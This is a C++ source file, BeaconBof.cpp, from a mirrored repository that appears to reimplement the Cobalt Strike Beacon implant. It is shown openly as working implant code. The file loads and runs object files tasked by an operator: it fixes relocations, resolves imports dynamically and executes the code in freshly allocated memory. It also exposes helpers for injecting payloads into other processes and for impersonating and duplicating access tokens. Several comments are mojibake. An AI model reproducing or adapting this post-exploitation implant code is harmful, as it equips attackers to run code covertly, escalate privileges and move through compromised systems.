qwqdanchun
/
ReBeacon_Src
mirror of https://github.com/qwqdanchun/ReBeacon_Src.git
1
0
Fork 1
Code Issues Projects Releases Wiki Activity
ReBeacon_Src/ReBeacon_Src/BeaconBof.cpp

263 lines
8.7 KiB
C++
Raw Blame History

#include "BeaconBof.h"
void __cdecl BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len)
{
ProcessInject(pid, 0, hProc, payload, p_len, p_offset, arg, a_len);
}
void __cdecl BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pi, char* payload, int p_len,int p_offset,char* arg,int arg_len)
{
ProcessInject(pi->dwProcessId, pi, pi->hProcess, payload, p_len, p_offset, arg, arg_len);
}
void __cdecl BeaconGetSpawnTo(BOOL x86, char* buffer, int length)
{
char path[256];
getspawntopath(path, x86);
if (length >= 256)
{
memcpy(buffer, path, 0x100u);
}
else
{
memcpy(buffer, path, length);
}
}
BOOL __cdecl SetBeaconToken(HANDLE hToken, char* buffer)
{
BeaconRevertToken();
if (!ImpersonateLoggedOnUser(hToken)
|| !DuplicateTokenEx(hToken, 0x2000000u, 0, SecurityDelegation, TokenPrimary, &pTokenHandle)
|| !ImpersonateLoggedOnUser(pTokenHandle)
|| !get_user_sid(0x100u, pTokenHandle, buffer))
{
return 0;
}
BeaconTaskOutput(buffer, strlen(buffer), 15u);
return 1;
}
BOOL __cdecl BeaconUseToken(HANDLE hToken)
{
char* buffer = (char*)malloc(256u);
memset(buffer, 0, 256);
BOOL ret = SetBeaconToken(hToken, buffer);
memset(buffer, 0, 256);
free(buffer);
return ret;
}
void __cdecl BeaconOutput(int type, char* data, int len)
{
BeaconTaskOutput(data, len, type);
}
void __cdecl BeaconPrintf(int type, char* fmt, ...)
{
va_list ArgList=0;
va_start(ArgList, fmt);
int size = vprintf(fmt, ArgList);
if (size > 0)
{
char* buffer = (char*)malloc(size + 1);
buffer[size] = 0;
vsprintf_s(buffer, size + 1, fmt, ArgList);
BeaconTaskOutput(buffer ,size, type);
memset(buffer, 0, size);
free(buffer);
}
}
void InitInternalFunctions(BeaconInternalFunctions* InternalFunctions)
{
memset(InternalFunctions, 0, 252);
InternalFunctions->LoadLibraryA = LoadLibraryA;
InternalFunctions->FreeLibrary = FreeLibrary;
InternalFunctions->GetProcAddress = GetProcAddress;
InternalFunctions->GetModuleHandleA = GetModuleHandleA;
InternalFunctions->BeaconDataParse = BeaconDataParse;
InternalFunctions->BeaconDataPtr = BeaconDataPtr;
InternalFunctions->BeaconDataInt = BeaconDataInt;
InternalFunctions->BeaconDataShort = BeaconDataShort;
InternalFunctions->BeaconDataLength = BeaconDataLength;
InternalFunctions->BeaconDataExtract = BeaconDataExtract;
InternalFunctions->BeaconFormatAlloc = BeaconFormatAlloc;
InternalFunctions->BeaconFormatReset = BeaconFormatReset;
InternalFunctions->BeaconFormatAppend = BeaconFormatAppend;
InternalFunctions->BeaconFormatPrintf = BeaconFormatPrintf;
InternalFunctions->BeaconFormatToString = BeaconFormatToString;
InternalFunctions->BeaconFormatFree = BeaconFormatFree;
InternalFunctions->BeaconFormatInt = BeaconFormatInt;
InternalFunctions->BeaconOutput = BeaconOutput;
InternalFunctions->BeaconPrintf = BeaconPrintf;
InternalFunctions->BeaconErrorD = BeaconErrorD;
InternalFunctions->BeaconErrorDD = BeaconErrorDD;
InternalFunctions->BeaconErrorNA = BeaconErrorNA;
InternalFunctions->BeaconUseToken = BeaconUseToken;
InternalFunctions->BeaconRevertToken = BeaconRevertToken;
InternalFunctions->BeaconIsAdmin = is_admin;
InternalFunctions->BeaconGetSpawnTo = BeaconGetSpawnTo;
InternalFunctions->BeaconInjectProcess = BeaconInjectProcess;
InternalFunctions->BeaconInjectTemporaryProcess = BeaconInjectTemporaryProcess;
InternalFunctions->BeaconSpawnTemporaryProcess = BeaconSpawnTemporaryProcess;
InternalFunctions->BeaconCleanupProcess = BeaconcloseAllHandle;
InternalFunctions->toWideChar = toWideChar;
}
int FixRelocation(BeaconBofRelocation* pBofRelocation, char* pcode_data, char* seg, int OffsetInSection, char* bof_code)
{
if (pBofRelocation->Type == 6)
{
*(DWORD*)&pcode_data[pBofRelocation->offset] += (DWORD)&seg[OffsetInSection];
return 1;
}
if (pBofRelocation->Type == 20)
{
*(DWORD*)&pcode_data[pBofRelocation->offset] = (DWORD)&seg[*(DWORD*)&pcode_data[pBofRelocation->offset]
- pBofRelocation->offset
- (DWORD)bof_code
- 4
+ OffsetInSection];
return 1;
}
BeaconErrorD(79, pBofRelocation->Type);
return 0;
}
char* GetBeaconFunPtr(BeaconInternalFunctions* pinternalFunctions, char* pfun)
{
char** p_end = &pinternalFunctions->end;
int number = 0 ;
char** pbeaconfun = &pinternalFunctions->end;
do
{
if (*pbeaconfun == pfun)
{
return (char*)(&pinternalFunctions->end + number);
}
++number;
++pbeaconfun;
} while (number < 32);
number = 0;
while (*p_end)
{
++number;
++p_end;
if (number >= 32)
{
return 0;
}
}
char* fun = (char*)(&pinternalFunctions->end + number);
*(char**)fun = pfun;
return fun;
}
void __cdecl beacon_bof(char* Taskdata, int Tasksize)
{
BeaconInternalFunctions* internalFunctions = (BeaconInternalFunctions*)malloc(252);
InitInternalFunctions(internalFunctions);
// 4 getEntryPoint
// 4 code
// 4 rdata
// 4 data2
// 4 relocations
// 4 args
datap pdatap;
BeaconDataParse(&pdatap, Taskdata, Tasksize);
int getEntryPoint = BeaconDataInt(&pdatap);
int code_size = 0;
char* pcode = BeaconDataPtr3(&pdatap,&code_size);
int rdata_size = 0;
char* prdata = BeaconDataPtr3(&pdatap, &rdata_size);
int data2_size = 0;
char* pdata2 = BeaconDataPtr3(&pdatap, &data2_size);
int relocations_size = 0;
char* prelocations = BeaconDataPtr3(&pdatap, &relocations_size);
int alen = 0;
char* args = BeaconDataPtr3(&pdatap, &alen);
char* bof_code = (char*)VirtualAlloc(0, code_size, 0x3000u, get_short(43));
if (bof_code)
{
datap pdatap;
BeaconDataParse(&pdatap, prelocations, relocations_size);
BeaconBofRelocation* pBofRelocation = (BeaconBofRelocation*)BeaconDataPtr(&pdatap, 12);
while (1)
{
BOOL status;
short id = pBofRelocation->id;
if (id == 1028) // SYMBOL_END
{
break;
}
if (id == 1024) // SYMBOL_RDATA
{
status = FixRelocation(pBofRelocation, pcode, prdata, pBofRelocation->OffsetInSection, bof_code);//<2F>޸<EFBFBD>rdata<74>ض<EFBFBD>λ
}
else if (id == 1025) // SYMBOL_DATA
{
status = FixRelocation(pBofRelocation, pcode, pdata2, pBofRelocation->OffsetInSection, bof_code);//<2F>޸<EFBFBD>DATA<54><41><EFBFBD>ض<EFBFBD>λ
}
else if (id == 1026) // SYMBOL_TEXT
{
status = FixRelocation(pBofRelocation, pcode, bof_code, pBofRelocation->OffsetInSection, bof_code);//<2F>޸<EFBFBD>code<64><65><EFBFBD>ض<EFBFBD>λ
}
else
{
char* pfun;
if (id == 1027) // SYMBOL_DYNAMICF
{
char* strModule = BeaconDataPtr2(&pdatap);
char* strFunction = BeaconDataPtr2(&pdatap);
HMODULE dllbase = GetModuleHandleA(strModule);
if (!dllbase)
{
dllbase = LoadLibraryA(strModule);
}
FARPROC functionaddress = GetProcAddress(dllbase, strFunction);
if (!functionaddress)
{
BeaconErrorFormat(76, (char*)"%s!%s", strModule, strFunction);
return;
}
char* p = GetBeaconFunPtr(internalFunctions, (char*)functionaddress);
if (!p)
{
BeaconErrorNA(0x4Eu);
return;
}
pfun = p;
}
else//<2F>޸<EFBFBD>
{
pfun = (char*)(&internalFunctions->LoadLibraryA + id);
}
status = FixRelocation(pBofRelocation, pcode, pfun, 0, bof_code);
}
if (!status)
{
return;
}
pBofRelocation = (BeaconBofRelocation*)BeaconDataPtr(&pdatap, 12);
}
memcpy(bof_code, pcode, code_size);
memset(pcode, 0, code_size);
if (CheckMemoryRWX(bof_code, code_size))
{
((void(__cdecl*)(char*, UINT)) & bof_code[getEntryPoint])(args, alen);
}
VirtualFree(bof_code, 0, 0x8000);
free(internalFunctions);
}
}
Reference in New Issue View Git Blame Copy Permalink